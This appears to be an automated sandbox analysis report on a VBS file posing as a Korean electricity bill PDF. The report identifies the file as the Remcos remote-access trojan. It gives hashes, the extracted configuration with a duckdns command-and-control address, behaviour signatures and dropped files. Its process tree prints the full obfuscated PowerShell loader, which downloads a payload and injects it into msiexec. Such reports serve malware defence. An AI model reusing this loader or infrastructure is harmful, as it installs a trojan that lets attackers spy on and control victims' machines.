Overview

overview

10

Static

static

1

2024 년 9...df.vbs

windows7-x64

10

2024 년 9...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-09-2024 09:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024 년 9 월분 전기세 청구서·pdf.vbs

  • Size

    74KB

  • MD5

    cd9505a0c492be1e52f012f624835147

  • SHA1

    bece8abdda5efe16102c4c04d66cb1ab644b0046

  • SHA256

    9f4e20aa889ca5e2dd1e9107fb07a51fae199a243b3c6b145863913f07d198b0

  • SHA512

    b0ab14293923b2ca6a06a0c198b42c8f18d463a2e374e230d6a7f9c13afa49cf4c0c9c87b2c4a9687eb5f6ddf2b7644a1f500cf4077148aaa21a3f23effb00be

  • SSDEEP

    1536:sHyobezwnrkAkPh3JXNP3kK8A+NtZD8A/KtMNVAf:sHyMCAqhtKNtd8bf

Score
10/10
remcosremotehostdiscoveryexecutionrat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • delete_file

    false

  • hide_file

    true

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-WDQFG0

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 11 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2024 년 9 월분 전기세 청구서·pdf.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:808
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejtCo ym.superSVirile.nemocTyngdusem nrEfteriUsmidtArneryTilliPApinarUpperoumpirt Shmuo OutfcHjrneo C.lilPasseTergatyUnsulp Pre e Mori]Sorre:Sac,h:Ma diTStormlRengrsSeert1Novem2Pre n ');$Ornaterne=$Produktionssystem[0];$Repertoirer248=(Shouse ' Sp e$KultugDist lSlageoBorepb.evanAlucenLR kla: BasuTNonphITransl SolsTIri,iv IndaIHovednGalatG RejseFossel Wisss MarceGuaryS Fred=MyeloNStaale E,skwRatio-Opvi oAbs lbfor,yjUdaa,e iljicStumpTAste, MinirS Scu YBoar S PlestPeriveKolonM Parl. CellN achE Ii lt Udb . ShraWF.rurEDeploBOpstiCBe.neLoutmaiOm,rseNikkeNBlindT Tilb ');Lnder ($Repertoirer248);Lnder (Shouse 'Elseb$ KoepTPru siAnnivlAwin,tSupervLandii OvovnSuspeg Retue oundlInsw sSt aneInfras.edin.GrandHOpt geFemina nfod SteieOutc rlcdfrsUtopi[Ba.wi$SelekDSalindLimnosInt rfDeta j ArileHazinnlapardAntite A th]Kikse= impu$Ind,oNAutomy D.ochKartoeFum ldPanhee anken finnsBaul ');$Undskyldeligstes=Shouse 'S ill$RepubT ultai gal lFolintKlappvTidssiAerofn Cs.rg IndueTr.erlPlurisDokt eVkstcsLeaka.Esp uD glyco ResswStandnUrohelSoegeoSkr,ta VessdNito.F afb,iMamm lTroskeMortg( hrom$BeskrOwh,llr Blinn.bstraUntratRidine Sm kr RussnP,raseUmaad, Bleg$BackbIGinninT.nnivStubmeAndorc Slvetbremsi.krtovG anti SkatsTriggtBioph)flera ';$Invectivist=$Unseasonable;Lnder (Shouse 'Seede$ ConfGfor,ilSovevoSljedBSbeskA onlalBestv:Nige cs.henHUghteUUten rLesskrProg =Playg(Strgnt An se Dives eaphtThurt-Kvot.pObstiAM,trotRostrhDjebe .aes$Lu eriSynknn J levKalkuEKejseC.nameTMuleniStemmvAnhimiPlainsDdsofTprocu)Endoc ');while (!$Churr) {Lnder (Shouse 'Foran$Fjan.gMaschl orsioC ntrbStt eaUvi el.ontu: ejslGAnerkaAttatm caphe.llocnPragtsSlvho=Trump$ReklatS.ripr Ep iuBurgle Meta ') ;Lnder $Undskyldeligstes;Lnder (Shouse 'Smd nSDiesetAlmueaFortrrPen atBeskf-Rs wsS Jordl Tante Fabre Unprp Avan Slimi4Conqu ');Lnder (Shouse ' Best$estrag SlvslSam io RefobArvemaA.onilHomog:djagoCSpa.shp epeuPolitrIsep,rS eri=Enlar( confTAne reAdfrdsimdektVandr- AdvaPLigesamemb tPrepehN tar If,di$PettiI Overn AutovDefoleTospac,essitM treiumrkevTjre.iAprops Billt,mbro)Disco ') ;Lnder (Shouse ' Glov$Urbang ortilnonveoGrimlb,aggaaPortulSpise:G ninIAntiln A cisP.romeVestvc LavpuExactrCorroiBillatUnd rySlart=u,cov$FiltrgSpreelAabeno,ratcb Ar iaGlistlOmst.:UnproLThorviAsylusOvalitLeu,oehertufEfterrXeropiO elunTan sg.fter+Bjlke+Laser% Nenn$Rok rPluxatrHeadlobademdImpreu LestkDa lit Tempi laahodrilln Ap rsMistrsRidseyKeisasguzemtDes.aeContrmPlate.Ma necSttteoCombuuGrisenphonotSucce ') ;$Ornaterne=$Produktionssystem[$Insecurity];}$Genistreger7=322791;$Iceboatsssalat=31553;Lnder (Shouse 'Harpe$ KnetgSecunl F,ero FyrbbPhantaMyosulFornr:HaandN MitueSpanddKrum fbestrlHai,md Er meSkurpl,ussiiBundfgUnsty7 Pont2,hikk Hoved=Tec n IntrGErkeneB.ndotSejer-,taffCBv,ruo SprrnTopv t Pharetekn nFe eltHemit Jrpek$ kneIDemagnS egevAntepePleoncForfotNabofi Ung.vCh fii ConssSe artZo,st ');Lnder (Shouse 'Appet$Tv ngg hakilSymasoAcierbMoralaparbalTopog:Rej rI Kordn pfiedClipprOuthiiKkkenmRivie Hj a=sympt Suged[Eft,rSPaasmyKolk.sUnplotC.rpoeAdinamTrack. F emCDauntoheretnPusilv ,deneTestir basst N nm] R ad: uppl:KakaoFTedesrLinchoPhonomElimiB ragia arcisKonsoe.chro6Toldb4Skam SKbsvatMystirKvadriTndstn AbsogPlaty(Telev$ Cyc,NSemiceUnderddriftf SvmmlBrevfdGym,ieTresil Rou iKeglegFrygt7C iro2Uropf) Z og ');Lnder (Shouse 'De re$Boobrg ettylVdenvoGoffeb R ina RevolNo,co:Wlec.APole nBringk Trree AmmorEnep pGrothlHuggpaSquasdPatrosLondreRekylrSnekan IsseeBodsv1Lip m1 dekr0Bundl psig=Kart, Ush k[PlicaSLjtnay Da ks TruttSolice veramSlat,. D.miT TimeeStu dxForsutSkral.a idnEUpernnWallpc Sammo Qui.dStyrii Pr.snhidegga.els]Genbr: Whim:JamaiAUn giSElm sCUdfreIInd.jIZambo.ReproGSysteeAmatrt CiviS Eg ltCyanirProgriBurmanVaticgDu li(Bevis$OrdinI dsaanN nepdQuindrSo,asiSte lmUnwre)Reins ');Lnder (Shouse 'H.ali$subvegdobbel.ereaoUnde,bH ppeaSkr mlSubwa: CervRMiljsiPi cogL,ngeh,ndlet SekslPlurae KartsLaundsTitmanEk poepsyc.sBagnesT,kke= S lv$Symp,ARatton AfmakCarnie vaudrOmgivpSelvmlQ aubaP rlodAftrksVauxheM sunrstenonAnth eB tte1Rytte1 ulti0Cadav. Sk.asOsteouLovlibSamkrs ountUnderrCentri StilnTitulgUtopi(Skjer$ OrdeGopspaeW,ltonRugekiMiliesp ocetExcerrRounjeNoningcun ie ConvrTands7somal,Fast $AbdicI,rovrc I daeVenosbSto moGaeldaKi hbtSta ksVaages Erass Couna udhul G,ltaInvectSamme)Corkb ');Lnder $Rightlessness;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3620
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejtCo ym.superSVirile.nemocTyngdusem nrEfteriUsmidtArneryTilliPApinarUpperoumpirt Shmuo OutfcHjrneo C.lilPasseTergatyUnsulp Pre e Mori]Sorre:Sac,h:Ma diTStormlRengrsSeert1Novem2Pre n ');$Ornaterne=$Produktionssystem[0];$Repertoirer248=(Shouse ' Sp e$KultugDist lSlageoBorepb.evanAlucenLR kla: BasuTNonphITransl SolsTIri,iv IndaIHovednGalatG RejseFossel Wisss MarceGuaryS Fred=MyeloNStaale E,skwRatio-Opvi oAbs lbfor,yjUdaa,e iljicStumpTAste, MinirS Scu YBoar S PlestPeriveKolonM Parl. CellN achE Ii lt Udb . ShraWF.rurEDeploBOpstiCBe.neLoutmaiOm,rseNikkeNBlindT Tilb ');Lnder ($Repertoirer248);Lnder (Shouse 'Elseb$ KoepTPru siAnnivlAwin,tSupervLandii OvovnSuspeg Retue oundlInsw sSt aneInfras.edin.GrandHOpt geFemina nfod SteieOutc rlcdfrsUtopi[Ba.wi$SelekDSalindLimnosInt rfDeta j ArileHazinnlapardAntite A th]Kikse= impu$Ind,oNAutomy D.ochKartoeFum ldPanhee anken finnsBaul ');$Undskyldeligstes=Shouse 'S ill$RepubT ultai gal lFolintKlappvTidssiAerofn Cs.rg IndueTr.erlPlurisDokt eVkstcsLeaka.Esp uD glyco ResswStandnUrohelSoegeoSkr,ta VessdNito.F afb,iMamm lTroskeMortg( hrom$BeskrOwh,llr Blinn.bstraUntratRidine Sm kr RussnP,raseUmaad, Bleg$BackbIGinninT.nnivStubmeAndorc Slvetbremsi.krtovG anti SkatsTriggtBioph)flera ';$Invectivist=$Unseasonable;Lnder (Shouse 'Seede$ ConfGfor,ilSovevoSljedBSbeskA onlalBestv:Nige cs.henHUghteUUten rLesskrProg =Playg(Strgnt An se Dives eaphtThurt-Kvot.pObstiAM,trotRostrhDjebe .aes$Lu eriSynknn J levKalkuEKejseC.nameTMuleniStemmvAnhimiPlainsDdsofTprocu)Endoc ');while (!$Churr) {Lnder (Shouse 'Foran$Fjan.gMaschl orsioC ntrbStt eaUvi el.ontu: ejslGAnerkaAttatm caphe.llocnPragtsSlvho=Trump$ReklatS.ripr Ep iuBurgle Meta ') ;Lnder $Undskyldeligstes;Lnder (Shouse 'Smd nSDiesetAlmueaFortrrPen atBeskf-Rs wsS Jordl Tante Fabre Unprp Avan Slimi4Conqu ');Lnder (Shouse ' Best$estrag SlvslSam io RefobArvemaA.onilHomog:djagoCSpa.shp epeuPolitrIsep,rS eri=Enlar( confTAne reAdfrdsimdektVandr- AdvaPLigesamemb tPrepehN tar If,di$PettiI Overn AutovDefoleTospac,essitM treiumrkevTjre.iAprops Billt,mbro)Disco ') ;Lnder (Shouse ' Glov$Urbang ortilnonveoGrimlb,aggaaPortulSpise:G ninIAntiln A cisP.romeVestvc LavpuExactrCorroiBillatUnd rySlart=u,cov$FiltrgSpreelAabeno,ratcb Ar iaGlistlOmst.:UnproLThorviAsylusOvalitLeu,oehertufEfterrXeropiO elunTan sg.fter+Bjlke+Laser% Nenn$Rok rPluxatrHeadlobademdImpreu LestkDa lit Tempi laahodrilln Ap rsMistrsRidseyKeisasguzemtDes.aeContrmPlate.Ma necSttteoCombuuGrisenphonotSucce ') ;$Ornaterne=$Produktionssystem[$Insecurity];}$Genistreger7=322791;$Iceboatsssalat=31553;Lnder (Shouse 'Harpe$ KnetgSecunl F,ero FyrbbPhantaMyosulFornr:HaandN MitueSpanddKrum fbestrlHai,md Er meSkurpl,ussiiBundfgUnsty7 Pont2,hikk Hoved=Tec n IntrGErkeneB.ndotSejer-,taffCBv,ruo SprrnTopv t Pharetekn nFe eltHemit Jrpek$ kneIDemagnS egevAntepePleoncForfotNabofi Ung.vCh fii ConssSe artZo,st ');Lnder (Shouse 'Appet$Tv ngg hakilSymasoAcierbMoralaparbalTopog:Rej rI Kordn pfiedClipprOuthiiKkkenmRivie Hj a=sympt Suged[Eft,rSPaasmyKolk.sUnplotC.rpoeAdinamTrack. F emCDauntoheretnPusilv ,deneTestir basst N nm] R ad: uppl:KakaoFTedesrLinchoPhonomElimiB ragia arcisKonsoe.chro6Toldb4Skam SKbsvatMystirKvadriTndstn AbsogPlaty(Telev$ Cyc,NSemiceUnderddriftf SvmmlBrevfdGym,ieTresil Rou iKeglegFrygt7C iro2Uropf) Z og ');Lnder (Shouse 'De re$Boobrg ettylVdenvoGoffeb R ina RevolNo,co:Wlec.APole nBringk Trree AmmorEnep pGrothlHuggpaSquasdPatrosLondreRekylrSnekan IsseeBodsv1Lip m1 dekr0Bundl psig=Kart, Ush k[PlicaSLjtnay Da ks TruttSolice veramSlat,. D.miT TimeeStu dxForsutSkral.a idnEUpernnWallpc Sammo Qui.dStyrii Pr.snhidegga.els]Genbr: Whim:JamaiAUn giSElm sCUdfreIInd.jIZambo.ReproGSysteeAmatrt CiviS Eg ltCyanirProgriBurmanVaticgDu li(Bevis$OrdinI dsaanN nepdQuindrSo,asiSte lmUnwre)Reins ');Lnder (Shouse 'H.ali$subvegdobbel.ereaoUnde,bH ppeaSkr mlSubwa: CervRMiljsiPi cogL,ngeh,ndlet SekslPlurae KartsLaundsTitmanEk poepsyc.sBagnesT,kke= S lv$Symp,ARatton AfmakCarnie vaudrOmgivpSelvmlQ aubaP rlodAftrksVauxheM sunrstenonAnth eB tte1Rytte1 ulti0Cadav. Sk.asOsteouLovlibSamkrs ountUnderrCentri StilnTitulgUtopi(Skjer$ OrdeGopspaeW,ltonRugekiMiliesp ocetExcerrRounjeNoningcun ie ConvrTands7somal,Fast $AbdicI,rovrc I daeVenosbSto moGaeldaKi hbtSta ksVaages Erass Couna udhul G,ltaInvectSamme)Corkb ');Lnder $Rightlessness;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3848
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      PID:2592

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat
    Filesize

    144B

    MD5

    0c3c1cf00a13c0e038c2654d0bf78a16

    SHA1

    9680a75cc7a98dc4197ec62d7c3cefcc8d23cb84

    SHA256

    1e3b02f534e1f5f0a0b3d1e7c64b085927419270e10eb22d11946931c816f0d5

    SHA512

    a7a790c2628036ac0558b4148cc81fa28fc7ec3d8c9a7c1eff19b10a2847bb1d27bf26c9708351180dadb3820b880372cdb2d78e859d345d5a6fc02a0ac24dd9

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    806286a9ea8981d782ba5872780e6a4c

    SHA1

    99fe6f0c1098145a7b60fda68af7e10880f145da

    SHA256

    cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713

    SHA512

    362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q5a51yib.fzo.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Maskes.lea
    Filesize

    461KB

    MD5

    ea499ea38a8e086008ff343b628809f6

    SHA1

    707ab355e7078bff7c196da77f4a5ff0c0ea2362

    SHA256

    b7a4595b962eaad033c02208443579a198a21fb2b97b0877a40f344debf840ac

    SHA512

    6dc431504913a8533d11bad6da2b4ee70879515c3ecd2ef42f2231b83c317018edf49d07c1bf154547ae42152ba016a3ef5a3a954288f6736450ed378d0eaa65

    Download Submit

  • memory/2592-60-0x0000000000C50000-0x0000000001EA4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/3620-16-0x00007FFBD0BC0000-0x00007FFBD1681000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3620-0-0x00007FFBD0BC3000-0x00007FFBD0BC5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3620-17-0x00007FFBD0BC0000-0x00007FFBD1681000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3620-18-0x00007FFBD0BC0000-0x00007FFBD1681000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3620-21-0x00007FFBD0BC0000-0x00007FFBD1681000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3620-14-0x00007FFBD0BC3000-0x00007FFBD0BC5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3620-12-0x00007FFBD0BC0000-0x00007FFBD1681000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3620-11-0x00007FFBD0BC0000-0x00007FFBD1681000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3620-1-0x000001B23E600000-0x000001B23E622000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3848-26-0x00000000060B0000-0x0000000006116000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3848-36-0x00000000061A0000-0x00000000064F4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/3848-25-0x0000000005960000-0x00000000059C6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3848-38-0x0000000006790000-0x00000000067AE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3848-39-0x00000000067C0000-0x000000000680C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/3848-40-0x0000000007FE0000-0x000000000865A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/3848-41-0x0000000006D20000-0x0000000006D3A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/3848-42-0x0000000007A00000-0x0000000007A96000-memory.dmp

    Filesize

    600KB

    Download

  • memory/3848-43-0x00000000079A0000-0x00000000079C2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3848-44-0x0000000008C10000-0x00000000091B4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/3848-24-0x00000000058C0000-0x00000000058E2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3848-46-0x00000000091C0000-0x000000000B37A000-memory.dmp

    Filesize

    33.7MB

    Download

  • memory/3848-23-0x0000000005A10000-0x0000000006038000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/3848-22-0x00000000051E0000-0x0000000005216000-memory.dmp

    Filesize

    216KB

    Download